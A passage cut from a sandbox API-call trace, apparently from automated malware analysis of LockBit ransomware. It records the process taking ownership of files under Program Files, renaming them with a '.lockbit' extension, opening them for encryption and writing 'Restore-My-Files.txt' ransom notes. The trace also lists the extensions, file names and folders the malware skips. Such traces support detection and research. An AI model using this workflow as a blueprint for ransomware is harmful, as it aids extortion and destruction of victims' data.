SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0084.944] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0084.944] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0085.870] NtClose (Handle=0x3c0) returned 0x0 [0085.870] RtlFreeAnsiString (AnsiString="\\") [0085.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0085.871] malloc (_Size=0x200) returned 0x53fcc0 [0085.871] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0085.871] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0085.871] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0085.871] CloseHandle (hObject=0x3c0) returned 1 [0085.871] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0085.872] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0085.873] free (_Block=0x53fcc0) [0085.873] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0086.532] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.lockbit")) returned 1 [0086.534] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0086.535] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0086.535] malloc (_Size=0x40068) returned 0x206b860 [0086.535] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=1437) returned 1 [0086.535] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0086.548] GetLastError () returned 0x3e5 [0086.548] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad") returned 1 [0086.548] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\Restore-My-Files.txt") returned 96 [0086.549] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0086.551] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0086.551] malloc (_Size=0x40068) returned 0x20abae0 [0086.551] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0086.554] GetLastError () returned 0x3e5 [0086.554] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 0 [0086.554] GetLastError () returned 0x12 [0086.554] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0086.555] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0086.555] lstrcmpiW (lpString1=".", lpString2="osknumpad.xml") returned -1 [0086.555] lstrcmpiW (lpString1="..", lpString2="osknumpad.xml") returned -1 [0086.555] PathFindExtensionW (pszPath="osknumpad.xml") returned=".xml" [0086.555] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0086.555] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0086.556] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0086.557] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0086.557] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="osknumpad.xml") returned 1 [0086.557] lstrcmpiW (lpString1="ntldr", lpString2="osknumpad.xml") returned -1 [0086.557] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="osknumpad.xml") returned -1 [0086.557] lstrcmpiW (lpString1="bootsect.bak", lpString2="osknumpad.xml") returned -1 [0086.557] lstrcmpiW (lpString1="autorun.inf", lpString2="osknumpad.xml") returned -1 [0086.557] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0086.557] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml") returned=".xml" [0086.557] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0086.557] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0086.557] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0086.558] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0086.559] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.lockbit") returned 87 [0086.559] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0086.559] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.lockbit")) returned 0 [0086.572] GetLastError () returned 0x5 [0086.572] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0086.572] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0086.572] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.573] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0086.573] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0086.573] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0086.574] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0086.574] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0086.590] NtClose (Handle=0x3c0) returned 0x0 [0086.590] RtlFreeAnsiString (AnsiString="\\") [0086.590] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0086.590] malloc (_Size=0x200) returned 0x53fcc0 [0086.590] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0086.591] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0086.591] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0086.591] CloseHandle (hObject=0x3c0) returned 1 [0086.591] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0086.591] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0086.591] free (_Block=0x53fcc0) [0086.591] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0086.592] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.lockbit")) returned 1 [0086.592] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0086.593] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0086.593] malloc (_Size=0x40068) returned 0x206b860 [0086.593] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=219) returned 1 [0086.593] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0086.594] GetLastError () returned 0x3e5 [0086.594] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0086.594] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0086.594] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.594] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="oskpred", cAlternateFileName="")) returned 1 [0086.688] lstrcmpiW (lpString1=".", lpString2="oskpred") returned -1 [0086.688] lstrcmpiW (lpString1="..", lpString2="oskpred") returned -1 [0086.688] lstrcmpiW (lpString1="oskpred", lpString2="$windows.~bt") returned 1 [0086.688] lstrcmpiW (lpString1="oskpred", lpString2="intel") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="msocache") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="$recycle.bin") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="$windows.~ws") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="tor browser") returned -1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="boot") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="system volume information") returned -1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="perflogs") returned -1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="google") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="application data") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="windows") returned -1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="windows.old") returned -1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="appdata") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="Windows nt") returned -1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="Msbuild") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="Microsoft") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="All users") returned 1 [0086.689] lstrcmpiW (lpString1="oskpred", lpString2="mozilla") returned 1 [0086.689] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned 73 [0086.689] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*") returned 75 [0086.689] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0086.690] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0086.690] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0086.690] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0086.690] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0086.690] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0086.690] lstrcmpiW (lpString1=".", lpString2="oskpredbase.xml") returned -1 [0086.690] lstrcmpiW (lpString1="..", lpString2="oskpredbase.xml") returned -1 [0086.690] PathFindExtensionW (pszPath="oskpredbase.xml") returned=".xml" [0086.690] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0086.690] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0086.690] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0086.690] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0086.690] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0086.690] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0086.691] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0086.692] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0086.692] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="oskpredbase.xml") returned 1 [0086.692] lstrcmpiW (lpString1="ntldr", lpString2="oskpredbase.xml") returned -1 [0086.692] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="oskpredbase.xml") returned -1 [0086.692] lstrcmpiW (lpString1="bootsect.bak", lpString2="oskpredbase.xml") returned -1 [0086.692] lstrcmpiW (lpString1="autorun.inf", lpString2="oskpredbase.xml") returned -1 [0086.692] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\") returned="" 